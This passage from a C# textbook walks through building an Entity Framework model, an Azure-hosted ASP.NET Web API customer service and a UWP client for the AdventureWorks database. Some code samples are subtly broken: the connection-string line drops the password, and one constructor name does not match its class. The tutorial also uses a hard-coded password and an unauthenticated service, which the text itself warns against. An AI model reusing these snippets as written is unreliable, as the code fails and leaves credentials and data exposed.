7. Click the NameStyle column, press the Ctrl key, and then click the
PasswordHash and PasswordSalt columns. Right-click the PasswordSalt
column, and then click Delete.
8. Visual Studio analyzes these columns. In the Preview Database Updates
dialog box, it displays a list of warnings and other issues that could
occur if the columns are removed.
Download from finelybook [email protected]
1022
9. In the Preview Database Updates dialog box, click Update Database.
10. Close the SQL Server Object Explorer pane, but leave Visual Studio
2017 open.
Creating an entity model
Now that you have created the AdventureWorks database in the cloud, you
can use the Entity Framework to create an entity model that an app can use to
query and update information in this database. If you have worked with
databases in the past, you might be familiar with technologies such as
ADO.NET, which provides a library of classes that you can use to connect to
a database and run SQL commands. ADO.NET is useful, but it requires that
you have a decent understanding of SQL, and if you are not careful, it can
force you into structuring your code around the logic necessary to perform
SQL commands instead of focusing on the business operations of your app.
The Entity Framework provides a level of abstraction that reduces the
dependencies that your apps have on SQL.
Essentially, the Entity Framework implements a mapping layer between a
relational database and your app; it generates an entity model that consists of
collections of objects that your app can use just as it would any other
collection. A collection typically corresponds to a table in the database, and
each row in a table corresponds to an item in the collection. You perform
queries by iterating through the items in a collection, usually with Language-
Integrated Query (LINQ). Behind the scenes, the entity model converts your
queries into SQL SELECT commands that fetch the data. You can modify the
data in the collection, and then you can arrange for the entity model to
generate and perform the appropriate SQL INSERT, UPDATE, and DELETE
commands to perform the equivalent operations in the database. In short, the
Entity Framework is an excellent vehicle for connecting to a database and
retrieving and managing data without requiring you to embed SQL
commands in your code.
In the following exercise, you will create a very simple entity model for
the Customer table in the AdventureWorks database. You will follow what is
known as the database-first approach to entity modeling. In this approach,
the Entity Framework generates classes based on the definitions of tables in
the database. The Entity Framework also provides a code-first approach; that
Download from finelybook [email protected]
1023
strategy can generate a set of tables in a database based on classes that you
have implemented in your app.
Note If you want more information about the code-first approach to
creating an entity model, see “Code First to an Existing Database” on
the Microsoft website at http://msdn.microsoft.com/data/jj200620.
Create the AdventureWorks entity model
1. In Visual Studio, open the Customers solution, located in the \Microsoft
Press\VCSBS\ Chapter 27\Web Service folder in your Documents
folder.
This project contains a modified version of the Customers app from
Chapter 26. The ViewModel implements additional commands, which
let a user navigate to the first or last customer in the customers
collection, and the command bar contains First and Last buttons that
invoke these commands. Additionally, the Cortana search functionality
has been removed to enable you to focus on the tasks at hand. (You are
more than welcome to add this feature back if you want a voice-
activated version of the app.)
2. In Solution Explorer, right-click the Customers solution (not the
Customers project), point to Add, and then click New Project.
3. In the Add New Project dialog box, in the left pane, click the Web node.
In the middle pane, click the ASP.NET Web Application template (make
sure that you don’t accidentally select the ASP.NET Core Web
Application template). In the Name box, type
AdventureWorksService, and then click OK.
4. In the New ASP.NET Web Application - AdventureWorksService
dialog box, click Azure API App, verify that the Web API check box is
selected, and then click OK:
Download from finelybook [email protected]
1024
As mentioned at the start of this section, you cannot access a relational
database directly from a UWP app, including when you use the Entity
Framework. Instead, you have created an Azure API app (this is not a
UWP app), and you will host the entity model that you create in this
app. Azure API App template enables you to build a web service that
you can host by using Azure, and enable client applications to connect
quickly and easily. The Web API elements provide additional wizards
and tools with which you can quickly create the code for the web
service, which is what you will do in the next exercise. This web service
will provide remote access to the entity model for the Customers UWP
app.
5. In Solution Explorer, right-click the AdventureWorksService project,
and then click Properties.
6. On the Properties page, click the Web tab in the left column.
7. On the Web page, click “Don’t open a page. Wait for a request from an
external application.”
Normally, when you run a web app from Visual Studio, the web browser
(Microsoft Edge) opens and attempts to display the home page for the
Download from finelybook [email protected]
1025
app. But the AdventureWorksService app does not have a home page;
the purpose of this app is to host the web service to which client apps
can connect and retrieve data from the AdventureWorks database.
8. In the Project Url box, change the address of the web app to
http://localhost:50000/, and then click Create Virtual Directory. In the
Microsoft Visual Studio message box that appears, verify that the virtual
directory was created successfully, and then click OK.
By default, the ASP.NET project template creates a web app that is
hosted with IIS Express, and it selects a random port for the URL. This
configuration sets the port to 50000 so that the subsequent steps in the
exercises in this chapter can be described more easily.
9. On the File menu, click Save All, and then close the Properties page.
10. In Solution Explorer, in the AdventureWorksService project, right-click
the Models folder, point to Add, and then click New Item.
11. In the Add New Item - AdventureWorksService dialog box, in the left
column, click the Data node. In the middle pane, click the ADO.NET
Entity Data Model template. In the Name box, type
AdventureWorksModel, and then click Add.
Download from finelybook [email protected]
1026
The Entity Data Model Wizard starts. You can use this wizard to
generate an entity model from an existing database.
12. On the Choose Model Contents page of the wizard, click EF Designer
From Database, and then click Next.
13. On the Choose Your Data Connection page, click New Connection.
14. If the Choose Data Source dialog box appears, select Microsoft SQL
Server in the Data Source box, and then click Continue.
Note The Choose Data Source dialog box appears only if you have
not previously used the Data Connection wizard and selected a
data source.
In the Connection Properties dialog box, in the Server Name box, type
Download from finelybook [email protected]
1027
the following: tcp:<servername>.database.windows.net,1433, where
<servername> is the unique name of the Azure SQL Database server
that you created in the previous exercise. Click Use SQL Server
Authentication and enter the name and password that you specified for
the administrator login in the previous exercise. Click Save my
Password. In the Select Or Enter A Database Name box, type
AdventureWorks, and then click OK.
This action creates a connection to the AdventureWorks database
Download from finelybook [email protected]
1028
running in Azure.
15. On the Choose Your Data Connection page, click No, Exclude Sensitive
Data From The Connection String. I Will Set It In My Application
Code. Verify that Save Connection Settings In Web.Config As is
selected, and then confirm that the name of the connection string is
AdventureWorksEntities. Click Next.
16. On the Choose Your Version page, select Entity Framework 6.x, and
then click Next.
17. On the Choose Your Database Objects And Settings page, expand
Tables, expand SalesLT, and then select Customer. Verify that the
Pluralize Or Singularize Generated Object Names check box is selected.
(The other two options on this page will also be selected by default.)
Observe that the Entity Framework generates the classes for the entity
Download from finelybook [email protected]
1029
model in the AdventureWorksModel namespace, and then click Finish.
The Entity Data Model Wizard generates an entity model for the
Customer table and displays a graphical representation in the Entity
Model editor on the screen, like this:
Download from finelybook [email protected]
1030
If the following Security Warning message box appears, select the Do
Not Show This Message Again check box, and then click OK. This
security warning appears because the Entity Framework uses a
technology known as T4 templates to generate the code for your entity
model, and it has downloaded these templates from the web by using
NuGet. The Entity Framework templates have been verified by
Microsoft and are safe to use.
18. In the Entity Model editor, right-click the MiddleName column and then
click Delete From Model. Using the same process, delete the Suffix,
CompanyName, and SalesPerson columns from the entity model.
Download from finelybook [email protected]
1031
The Customers app does not use these columns, and there is no need to
retrieve them from the database. They allow null values, so they can
safely be left as part of the database table. However, you should not
remove the rowguid and ModifiedDate columns. These columns are
used by the database to identify rows in the Customer table and track
changes to these rows in a multiuser environment. If you remove these
columns, you will not be able to save data back to the database correctly.
19. On the Build menu, click Build Solution.
20. In Solution Explorer, in the AdventureWorksService project, expand the
Models folder, expand AdventureWorksModel.edmx, expand
AdventureWorksModel.tt, and then double-click Customer.cs.
This file contains the class that the Entity Data Model Wizard generates
to represent a customer. This class contains automatic properties for
each of the columns in the Customer table that you have included in the
entity model:
Click here to view code image
public partial class Customer
{
public int CustomerID { get; set; }
public string Title { get; set; }
public string FirstName { get; set; }
public string LastName { get; set; }
public string EmailAddress { get; set; }
public string Phone { get; set; }
public System.Guid rowguid { get; set; }
public System.DateTime ModifiedDate { get; set; }
}
21. In Solution Explorer, under the entry for AdventureWorksModel.edmx,
expand AdventureWorksModel.Context.tt, and then double-click
AdventureWorksModel.Context.cs.
This file contains the definition of a class called
AdventureWorksEntities. (It has the same name as you used when you
generated the connection to the database in the Entity Data Model
Wizard.)
Click here to view code image
public partial class AdventureWorksEntities : DbContext
Download from finelybook [email protected]
1032
{
public AdventureWorksEntities()
: base("name=AdventureWorksEntities")
{
}
protected override void OnModelCreating(DbModelBuilder
modelBuilder)
{
throw new UnintentionalCodeFirstException();
}
public DbSet<Customer> Customers { get; set; }
}
The AdventureWorksEntities class is descended from the DbContext
class, and this class provides the functionality that an app uses to
connect to the database. The default constructor passes a parameter to
the base-class constructor that specifies the name of the connection
string to use to connect to the database. If you look in the web.config
file, you will find this string in the <ConnectionStrings> section. It
contains the parameters (among other things) that you specified when
you ran the Entity Data Model Wizard. However, this string does not
contain the password information required to authenticate the
connection because you elected to provide this data at runtime. You will
handle this in the following steps.
You can ignore the OnModelCreating method in the
AdventureWorksEntities class. The only other item is the Customers
collection. This collection has the type DbSet<Customer>. The DbSet
generic type provides methods with which you can add, insert, delete,
and query objects in a database. It works in conjunction with the
DbContext class to generate the appropriate SQL SELECT commands
necessary to fetch customer information from the database and populate
the collection. It is also used to create the SQL INSERT, UPDATE, and
DELETE commands that run if Customer objects are added, modified,
or removed from the collection. A DbSet collection is frequently
referred to as an entity set.
22. In Solution Explorer, right-click the Models folder, click Add, and then
click Class.
23. In the Add New Item - AdventureWorksService dialog box, ensure that
Download from finelybook [email protected]
1033
the Class template is selected. In the Name box, type
AdventureWorksEntities, and then click Add.
A new class named AdventureWorksEntities is added to the project and
is displayed in the Code and Text Editor window. This class currently
conflicts with the existing class of the same name generated by the
Entity Framework, but you will use this class to augment the Entity
Framework code by converting it to a partial class. A partial class is a
class in which the code is split across one or more source files. This
approach is useful for tools such as the Entity Framework because it
enables you to add your own code without the risk of having it
accidentally overwritten if the Entity Framework code is regenerated at
some point in the future.
24. In the Code and Text editor window, modify the definition of the
AdventureWorksEntities class to make it partial, as shown in bold in the
following.
Click here to view code image
public partial class AdventureWorksEntities
{
}
25. In the AdventureWorksEntities class, add a constructor that takes a string
parameter named password. The constructor should invoke the base-
class constructor with the name of the connection string previously
written to the web.config file by the Entity Data Model Wizard
(specified on the Choose Data Connection page).
Click here to view code image
public partial class AdventureWorksEntities
{
public AdventureWorksEntities(string password)
: base("name=AdventureWorksEntities")
{
}
}
26. Add the code shown below in bold to the constructor. This code
modifies the connection string used by the Entity Framework to include
the password. The Customers app will call this constructor and provide
the password at runtime.
Download from finelybook [email protected]
1034
Click here to view code image
public partial class AdventureWorksEntities
{
public AdventureWorksEntities(string password)
: base("name=AdventureWorksEntities")
{
this.Database.Connection.ConnectionString +=
$";Password=";
}
}
Creating and using a REST web service
You have created an entity model that provides operations to retrieve and
maintain customer information. The next step is to implement a web service
so that a UWP app can access the entity model.
With Visual Studio 2017, you can create a web service in an ASP.NET
web app based directly on an entity model generated by the Entity
Framework. The web service uses the entity model to retrieve data from a
database and update the database. You create a web service by using the Add
Scaffold wizard. This wizard can generate a web service that implements the
REST model, which uses a navigational scheme to represent business objects
and services over a network and the HTTP protocol to transmit requests to
access these objects and services. A client app that accesses a resource
submits a request in the form of a URL, which the web service parses and
processes. For example, Adventure Works might publish customer
information, exposing the details of each customer as a single resource, by
using a scheme similar to this:
Click here to view code image
http://Adventure-Works.com/DataService/Customers/1
Accessing this URL causes the web service to retrieve the data for
customer 1. This data can be returned in a number of formats, but for
portability, the most common formats include XML and JavaScript Object
Notation (JSON). A typical JSON response generated by a REST web service
request issuing the previous query looks like this:
Click here to view code image
{
Download from finelybook [email protected]
1035
"CustomerID":1,
"Title":"Mr",
"FirstName":"Orlando",
"LastName":"Gee",
"EmailAddress":"[email protected]",
"Phone":"245-555-0173"
}
The REST model relies on the app that accesses the data to send the
appropriate HTTP verb as part of the request to access the data. For example,
the simple request shown previously should send an HTTP GET request to
the web service. HTTP supports other verbs as well, such as POST, PUT, and
DELETE, which you can use to create, modify, and remove resources,
respectively. Writing the code to generate the appropriate HTTP requests and
parsing the responses returned by a REST web service all sounds quite
complicated. Fortunately, the Add Scaffold wizard can generate most of this
code for you.
In the following exercise, you will create a simple REST web service for
the AdventureWorks entity model. This web service will make it possible for
a client app to query and maintain customer information.
Create the AdventureWorks web service
1. In Visual Studio, in the AdventureWorksService project, right-click the
Controllers folder, point to Add, and then click New Scaffolded Item.
2. In the Add Scaffold wizard, in the middle pane, click the Web API 2
Controller With Actions, Using Entity Framework template, and then
click Add.
Download from finelybook [email protected]
1036
3. In the Add Controller dialog box, in the Model Class drop-down list,
select Customer (AdventureWorksService.Models). In the Data Context
Class drop-down list, select AdventureWorksEntities
(AdventureWorksService.Models). Select the Use Async Controller
Actions check box. Verify that the Controller name is set to
CustomersController, and then click Add.
In a web service created by using the ASP.NET Web API template, all
incoming web requests are handled by one or more controller classes,
and each controller class exposes methods that map to the different types
Download from finelybook [email protected]
1037
of REST requests for each of the resources that the controller exposes.
For example, the CustomersController looks like this:
Click here to view code image
public class CustomersController : ApiController
{
private AdventureWorksEntities db = new
AdventureWorksEntities();
// GET: api/Customers
public IQueryable<Customer> GetCustomers()
{
return db.Customers;
}
// GET: api/Customers/5
[ResponseType(typeof(Customer))]
public async Task<IHttpActionResult> GetCustomer(int id)
{
Customer customer = await db.Customers.FindAsync(id);
if (customer == null)
{
return NotFound();
}
return Ok(customer);
}
// PUT: api/Customers/5
[ResponseType(typeof(void))]
public async Task<IHttpActionResult> PutCustomer(int id,
Customer customer)
{
if (!ModelState.IsValid)
{
return BadRequest(ModelState);
}
if (id != customer.CustomerID)
{
return BadRequest();
}
db.Entry(customer).State = EntityState.Modified;
try
{
await db.SaveChangesAsync();
}
Download from finelybook [email protected]
1038
catch (DbUpdateConcurrencyException)
{
if (!CustomerExists(id))
{
return NotFound();
}
else
{
throw;
}
}
return StatusCode(HttpStatusCode.NoContent);
}
// POST: api/Customers
[ResponseType(typeof(Customer))]
public async Task<IHttpActionResult> PostCustomer(Customer
customer)
{
}
// DELETE: api/Customers/5
[ResponseType(typeof(Customer))]
public async Task<IHttpActionResult> DeleteCustomer(int id)
{
...
}
...
}
The GetCustomers method handles requests to retrieve all customers,
and it satisfies this request by simply returning the entire Customers
collection from the Entity Framework data model that you created
previously. Behind the scenes, the Entity Framework fetches all the
customers from the database and uses this information to populate the
Customers collection. This method is invoked if an app sends an HTTP
GET request to the api/Customers URL in this web service.
The GetCustomer method (not to be confused with GetCustomers) takes
an integer parameter. This parameter specifies the CustomerID of a
specific customer, and the method uses the Entity Framework to find the
details of this customer before returning it. GetCustomer runs when an
app sends an HTTP GET request to the api/Customers/n URL, where n
is the ID of the customer to retrieve.
Download from finelybook [email protected]
1039
The PutCustomer method runs when an app sends an HTTP PUT
request to the web service. The request specifies a customer ID and the
details of a customer, and the code in this method uses the Entity
Framework to update the specified customer with the details. The
PostCustomer method responds to HTTP POST requests and takes the
details of a customer as its parameter. This method adds a new customer
with these details to the database (the details are not shown in the
preceding code sample). Finally, the DeleteCustomer method handles
HTTP DELETE requests and removes the customer with the specified
customer ID.
Note The code generated by the Web API template optimistically
assumes that it will always be able to connect to the database. In
the world of distributed systems, where the database and web
service are located on separate servers, this might not always be
the case. Networks are prone to transient errors and timeouts; a
connection attempt might fail because of a temporary glitch and
succeed if it is retried a short time later. Reporting a temporary
glitch to a client as an error can be frustrating to the user. If
possible, it might be better to silently retry the failing operation as
long as the number of retries is not excessive (you don’t want the
web service to freeze if the database is really unavailable). For
detailed information on this strategy, see “Cloud Service
Fundamentals Data Access Layer-Transient Fault Handling” at
http://social.technet.microsoft.com/wiki/contents/articles/18665.cloud-
service-fundamentals-data-access-layer-transient-fault-
handling.aspx.
The ASP.NET Web API template automatically generates code that
directs requests to the appropriate method in the controller classes, and
you can add more controller classes if you need to manage other
resources, such as products or orders.
Download from finelybook [email protected]
1040
Note For detailed information on implementing REST web
services by using the ASP.NET Web API template, see “Web API”
at http://www.asp.net/web-api.
You can also create controller classes manually by using the same
pattern as that shown by the CustomersController class—you do not
have to fetch and store data in a database by using the Entity
Framework. The ASP.Net Web API template contains an example
controller in the ValuesController.cs file that you can copy and augment
with your own code.
4. In the CustomersController class, modify the statement that creates the
AdventureWorksEntities context object to use the constructor that takes a
password as its parameter. As the argument to the constructor, provide
the administrator password that you specified when you created the
database. (In the following code sample, replace the string
YourPassword with your own password.)
Click here to view code image
public class CustomersController : ApiController
{
private AdventureWorksEntities db = new
AdventureWorksEntities("YourPassword");
// GET: api/Customers
public IQueryable<Customer> GetCustomers()
{
return db.Customers;
}
...
}
Note In the real world, you should never hard-code a password in
this way. Instead, you should protect the password by storing it in
an encrypted section of the web.config file for the web service. For
Download from finelybook [email protected]
1041
more information, see Encrypting Configuration Information
Using Protected Configuration at
https://msdn.microsoft.com/library/51cdfe5b-9d82-458c-94ff-
c551c4f38ed1.
5. In the Controllers folder, right-click the ValuesController.cs file, and
then click Delete. In the Message box, click OK to confirm that you
want to delete this file.
You will not be using the example ValuesController class in this
exercise.
6. In Solution Explorer, right-click the AdventureWorksService project,
point to Debug and then click Start New Instance.
This action starts the IISExpress web server which hosts the web
service. You will see the Diagnostic Tools pane in Visual Studio to
indicate that the website is running, but there will be no other
indications; you need to navigate to the website using a browser to
verify that it is functioning correctly.
7. Open Microsoft Edge, and move to the URL
http://localhost:50000/api/Customers. This address should cause the
web service to receive an HTTP Get request for customers, which
should run the GetCustomers method inside your code. The result is a
list of all customers, presented as a JSON array:
Download from finelybook [email protected]
1042
8. Change the URL to http://localhost:50000/api/Customers/5. This
causes the web service to run the GetCustomer (singular) method,
passing it the parameter 5. You should see the details for customer 5
displayed in the browser:
9. Close Microsoft Edge and return to Visual Studio.
10. On the Debug menu, click Stop Debugging.
You can now deploy the web service to Azure. You can do this by using
the Publish Web wizard available with Visual Studio 2017 to create a web
app in the cloud and upload the web service to this app.
Deploy the web service to the cloud
Download from finelybook [email protected]
1043
1. On the View menu, click Server Explorer.
2. In Server Explorer, right-click Azure, and then click Connect to
Microsoft Azure Subscription.
3. In the Sign In To Your Account dialog box, enter the name and
password for your Azure account and log in to Azure.
4. In Solution Explorer, right-click the AdventureWorksService project
and then click Publish.
The Publish Web wizard starts.
5. Under Select A Publish Target, click Microsoft Azure App Service,
click Create New, and then click Publish.
6. In the Create App Service dialog box, accept the default App Name,
select your Subscription, and set the Resource Group to awgroup (you
created this resource group earlier, using the Azure portal). Next to the
App Service Plan box, click New.
Download from finelybook [email protected]
1044
7. In the Configure App Service Plan dialog box, set the Location to your
nearest site, in the Size drop-down list box select Free, and then click
OK.
Download from finelybook [email protected]
1045
The App Service Plan determines the resources available for your API
app in the cloud. Behind the scenes, Microsoft hosts your API app on a
web server, or a web server farm, depending on the size of the plan that
you specify. If you are building a commercial application that is
intended to handle many thousands of requests a second, you will likely
require a plan that provides large-scale resources. However, you will be
charged accordingly. For this application, you should select the Free
plan, which provides limited throughput and memory, but it is fine for
prototyping and building small web services.
Important If you select a size other than Free, you will be charged
for use, and some of the app service plans can cost several hundred
Download from finelybook [email protected]
1046
dollars a month!
8. Back in the Create App Service dialog box, click Create.
The Azure API app should be deployed to the cloud. The browser
should open and display a “getting started” page that provides some
links to documentation about using Azure API apps.
9. Close the web browser and return to Visual Studio.
The next phase of this journey is to connect to the web service from the
Customers UWP app and then use the web service to fetch some data. In the
good old days, this process would involve generating HTTP REST requests,
sending them to the web service, waiting for the results, and then parsing the
data returned so that the app can display it (or handle any errors that might
have occurred). However, one of the beauties of deploying a REST web
service as an Azure API app is that Azure can generate a bunch of metadata
that describes your web service and the operations it provides. You can use
the REST API Client wizard in Visual Studio to query this metadata, and the
wizard will generate an object model that connects to the web service and
sends it requests. You use this object model to insulate your application from
the low-level details required to send and receive data across the web. As
such, you can focus on the business logic that displays and manipulates the
objects published through the web service. You will use these classes in the
following exercise. You will also use the JSON parser implemented by the
Json.NET package. You will have to add this package to the Customers
project.
Important This exercise retrieves the data for every customer. This
approach is fine for systems that utilize a small amount of data, as it
prevents repeated network access. However, in a large-scale system
(such as a multinational e-commerce application), you should be more
selective. If the database contains a large volume of data, you will likely
swamp the user’s device running the application. A better approach is to
use paging, whereby data is fetched in blocks (maybe of 200 records at
Download from finelybook [email protected]
1047
a time). The web service would need to be updated to support this
approach, and the ViewModel in the app would need to manage
fetching blocks of records transparently. This is left as an exercise for
the reader.
Fetch data from the AdventureWorks web service
1. In Solution Explorer, in the Customers project, right-click the
DataSource.cs file and then click Delete. In the message box, click OK
to confirm that you want to delete the file.
This file contained the sample data used by the Customers app. You are
going to modify the ViewModel class to fetch this data from the web
service, so this file is no longer required.
2. Right-click the Customers project, and then click Manage NuGet
Packages.
3. In the NuGet Package Manager: Customers window, make sure that the
Filter drop-down list box is set to All, and then type Json.NET in the
search box.
4. In the pane displaying the search results, select the Newtonsoft.Json
package. In the right pane, set the Action to Install, and then click
Install.
5. In the Preview window, click OK.
6. In the License Acceptance window, review the license information, and
then click I Accept if you wish to continue (if you don’t, the package
won’t be installed and you won’t be able to complete this exercise!).
7. Wait for the package to be installed, and then close the NuGet Package
Manager: Customers window.
8. In Solution Explorer, right-click the Customers project again, point to
Add, and then click REST API Client.
This action starts the wizard that generates the object model that your
application can use to connect to the web service.
Download from finelybook [email protected]
1048
9. In the Add REST API Client window, click Select Azure Asset.
10. In the App Service window, select your Azure subscription. In the
Search box, expand the awgroup resource group, select the web service
that you created in the previous exercise, and then click OK.
11. Back in the Add REST API Client window, click OK.
Visual Studio will connect to Azure and download the metadata for the
web service, and also install several additional NuGet packages
containing libraries required to support the code generated by the
wizard. Wait for the operation to complete.
12. In Solution Explorer, you should see a new folder named after your web
service, AdventureWorksServicennnnnnnnn. Expand this folder, and
also expand the Models folder that this folder contains.
13. In the Models folder, double-click the file Customer.cs to display it in
the Code and Text Editor window. This file contains a class named
Customer, which models the data retrieved from the web service. It
Download from finelybook [email protected]
1049
contains fields and properties for each of the attributes you specified for
the Customer entity when you constructed the web service using the
Entity Framework, together with a constructor that you can use to create
a new Customer object.
14. In the AdventureWorksServicennnnnnnnn folder, double-click the
CustomersOperations.cs file and review it in the Code and Text Editor
window. This file contains the code that interacts with the various REST
operations that your UWP application uses to send and receive data from
the web service. Amongst other things, you should see static methods
named GetCustomersWithHttpMessagesAsync,
PostCustomersWithHttpMessagesAsync,
GetCustomerWithHttpMessagesAsync,
PutCustomerWithHttpMessagesAsync, and
DeleteCustomerWithHttpMessagesAsync. Each of these methods
contains the low-level code required to construct and send HTTP
requests and handle the results. You are welcome to examine this code
in detail, but it is not necessary to understand it, and you should not
change it; if you regenerate the REST web client code by using the
Visual Studio wizard later, any changes you make will be lost.
15. Double-click the CustomersOperationsExtension.cs file and view it in
the Code and Text Editor window. This file contains a series of
extension messages for the CustomerOperations class. Their purpose is
to provide a simplified programmatic API. The
CustomerOperationsExtension class has pairs of methods that wrap the
corresponding operations in the CustomerOperations class and perform
the necessary task handling and cancellation processing. For example,
the CustomerOperationsExtension class has a pair of methods named
GetCustomers, and GetCustomersAsync, both of which invoke the
GetCustomersWithHttpMessagesAsync method in the
CustomerOperations class. The Customers UWP app will make use of
these extension methods.
16. Double-click the AdventureWorksServicennnnnnnnn.cs file and view it
in the Code and Text Editor window. This file implements the
AdventureWorksServicennnnnnnnn class which you use to establish a
connection to the web service. The bulk of this class comprises a series
of pubic and protected constructors, which you can use to specify the
Download from finelybook [email protected]
1050
URL of the web service, security credentials, and other options.
As it stands, the web service does not implement any form of
authentication; anyone who knows the URL of the web service can send
it requests. In a real-world web service exposing company-confidential
information, would be unacceptable. However, for this application, we
will omit this task as the web service only contains sample data.
Although the default configuration for the Azure API App is for
authentication to be disabled (see the sidebar Azure API App Security),
the public constructors for the AdventureWorksServicennnnnnnnn class
expect you to provide details that the web service can use to authenticate
you. The rationale behind this apparent anomaly is that deciding not to
use authentication in an app should be a conscious decision and not just
because you forgot to do so! However, the
AdventureWorksServicennnnnnnnn class does provide protected
constructors that do not require authentication information. You might
be tempted simply to change the access to these constructors to public so
that you can use them, but bear in mind that if you regenerate the REST
API client code, you will lose these changes (and it is also not good
practice). Instead, you should create a new class that extends
AdventureWorksServicennnnnnnnn and add a public constructor to this
class that calls the appropriate protected constructor in the
AdventureWorksServicennnnnnnnn class.
Azure API App Security
By default, when you deploy an Azure API app, authentication is
disabled, meaning that the web service exposed by the API is
available for use by anyone. You can see this in the Azure portal if
you go to your Azure API app and click the
Authentication/Authorization settings:
Download from finelybook [email protected]
1051
However, you can easily enable authentication simply by
clicking the On button. You will then be given the option of how to
authenticate users. For example, you could ask users to log in
using a Microsoft account, or through Facebook, Twitter, or
Google (you can select multiple authentication options if required).
If you are creating a corporate application, you might prefer to use
Azure Active Directory. In each case, you need to register your
application with the authentication provider and arrange how users
will be authorized once they are authenticated.
Download from finelybook [email protected]
1052
For more information, visit Authentication and authorization in
Azure App Service at https://docs.microsoft.com/en-gb/azure/app-
service/app-service-authentication-overview#what-is-app-service-
authentication--authorization.
Once you have configured authentication, when you connect to
the web service you will be prompted for your credentials using
the appropriate authentication provider. If you are building a UWP
app, you can provide these credentials to the constructor that
creates the object that connects to the web service (an instance of
the AdventureWorksServicennnnnnnnn class in the example
shown in the exercises).
17. In Solution Explorer, right-click the Customers project, point to Add,
and then click Class. In the Add New Item – Customers dialog box,
enter the name AdventureWorksService.cs, and then click Add.
18. In the Code and Text Editor window, modify the
Download from finelybook [email protected]
1053
AdventureWorksService class to inherit from the
AdventureWorksServicennnnnnnnn class, as shown below in bold:
Click here to view code image
class AdventureWorksService : AdventureWorksServicennnnnnnnn
{
}
19. Add the public constructor shown in bold in the code that follows, to the
AdventureWorksService class:
Click here to view code image
class AdventureWorksService : AdventureWorksServicennnnnnnnn
{
public AdventureWorks()
: base ()
{
}
}
This constructor actually invokes the following constructor in the
AdventureWorksServicennnnnnnnn class:
Click here to view code image
protected AdventureWorksServicennnnnnnnn(params
DelegatingHandler[] handlers) : base(handlers)
{
this.Initialize();
}
Remember that the params keyword specifies a parameters array. If you
pass an empty parameter list, the params array will be empty. The
Initialize method in the AdventureWorksServicennnnnnnnn class
actually does the work of initializing the settings for the connection to
the web service
20. In Solution Explorer, double-click ViewModel to display the ViewModel
class in the Code and Text Editor window.
21. In the ViewModel constructor, comment out the code that sets the
customers field to the DataSource.Customers list, and add the following
code shown in bold:
Click here to view code image
Download from finelybook [email protected]
1054
public ViewModel()
{
...
// this.customers = DataSource.Customers;
try
{
AdventureWorksService service = new
AdventureWorksService();
this.customers =
service.CustomersOperations.GetCustomers().ToList();
}
catch
{
this.customers = null;
}
}
The customers list contains the customers displayed by the app; it was
previously populated with the data in the DataSource.cs file that you
removed. The new code creates an AdventureWorksService object that
connects to your web service. The CustomersOperations property of this
object is a reference to a CustomerOperations object, which provides the
GetCustomers method to fetch the data from the web service, as
described previously. The data is converted to a list and stored in the
customers variable. Note that if an exception occurs, the customers list
is set to null; no customers will appear.
22. On the Debug menu, click Start Debugging to build and run the app.
It will take a few moments while the application fetches the data from
the web service; the splash screen will appear, but then the details of the
first customer, Orlando Gee, should be displayed:
Download from finelybook [email protected]
1055
23. Use the navigation buttons in the command bar to move through the list
of customers to verify that the form works as expected.
24. Return to Visual Studio and stop debugging.
Inserting, updating, and deleting data through a REST
web service
Apart from giving users the ability to query and display data, many apps have
the requirement to let users insert, update, and delete information. The
ASP.NET Web API implements a model that supports these operations
through the use of HTTP PUT, POST, and DELETE requests.
Conventionally, a PUT request modifies an existing resource in a web
service, and a POST request creates a new instance of a resource. A DELETE
request removes a resource. The code generated by the Add Scaffold wizard
Download from finelybook [email protected]
1056
in the ASP.NET Web API template follows these conventions.
Idempotency in REST web services
In a REST web service, PUT requests should be idempotent, which
means that if you perform the same update repeatedly, the result should
always be the same. In the case of the AdventureWorksService
example, if you modify a customer and set the telephone number to
“888-888-8888,” it does not matter how many times you perform this
operation because the effect is identical. This might seem obvious, but
you should design a REST web service with this requirement in mind.
With this design approach, a web service can be robust in the face of
concurrent requests, or even in the event of network failures (if a client
app loses the connection to the web service, it can simply attempt to
reconnect and perform the same request again without being concerned
whether the previous request was successful). Therefore, you should
think of a REST web service as a means for storing and retrieving data,
and you should not attempt to implement business-specific operations.
For example, if you were building a banking system, you might be
tempted to provide a CreditAccount method that adds an amount to the
balance in a customer’s account and expose this method as a PUT
operation. However, each time you invoke this operation, the result is
an incremental credit to the account. Therefore, it becomes necessary to
track whether calls to the operation are successful. Your app cannot
invoke this operation repeatedly if it thinks an earlier call failed or
timed out because the result could be multiple, duplicated credits to the
same account.
For more information about managing data consistency in cloud
applications, see “Data Consistency Primer” at
https://msdn.microsoft.com/library/dn589800.aspx.
In the next exercise, you will extend the Customers app and add features
with which users can add new customers and modify the details of existing
customers. The app will use the construct and submit the appropriate REST
Download from finelybook [email protected]
1057
requests by using the REST API client and model you generated by using
Visual Studio. You will not provide any functionality to delete customers.
This restriction ensures that you have a record of all customers that have done
business with the Adventure Works organization, which might be required
for auditing purposes. Additionally, even if a customer has not been active
for a long time, there is a chance that the customer might place an order at
some point in the future.
Note It is becoming increasingly commonplace for business
applications never to delete data but simply to perform an update that
marks the data as “removed” in some way and prevents it from being
displayed. This is primarily because of the requirements to keep
complete data records, often to meet regulatory requirements.
Implement add and edit functionality in the ViewModel class
1. Return to Visual Studio.
2. In Solution Explorer, double-click the Customer.cs file in the root folder
of the Customers project to display it in the Code and Text Editor
window.
3. Immediately after the Phone property, add the following public
properties shown in bold to the Customer class:
Click here to view code image
public class Customer : INotifyPropertyChanged
{
...
public string Phone
{
...
}
public System.Guid rowguid { get; set; }
public System.DateTime ModifiedDate { get; set; }
...
}
Download from finelybook [email protected]
1058
The web service retrieves these fields from the database. Previously you
have ignored them when copying data into the customers list, but these
properties are important for updating data; the entity framework uses
these properties to determine which rows to change and to help resolve
conflicts if multiple users attempt to modify the same data
simultaneously.
4. In the Customers project, delete the ViewModel.cs file to remove it from
the project. Allow Visual Studio to delete this file permanently.
5. Right-click the Customers project, point to Add, and then click Existing
Item. Select the ViewModel.cs file, which is located in the \Microsoft
Press\VCSBS\Chapter 27 folder in your Documents folder, and then
click Add.
The code in the ViewModel.cs file is getting rather lengthy, so it has
been reorganized into regions to make it easier to manage. The
ViewModel class has also been extended with the following Boolean
properties that indicate the mode in which the ViewModel is operating:
Browsing, Adding, or Editing. These properties are defined in the region
named Properties For Managing The Edit Mode:
IsBrowsing This property indicates whether the ViewModel is
in Browsing mode. When the ViewModel is in Browsing mode,
the FirstCustomer, LastCustomer, PreviousCustomer, and
NextCustomer commands are enabled, and a view can invoke
these commands to browse data.
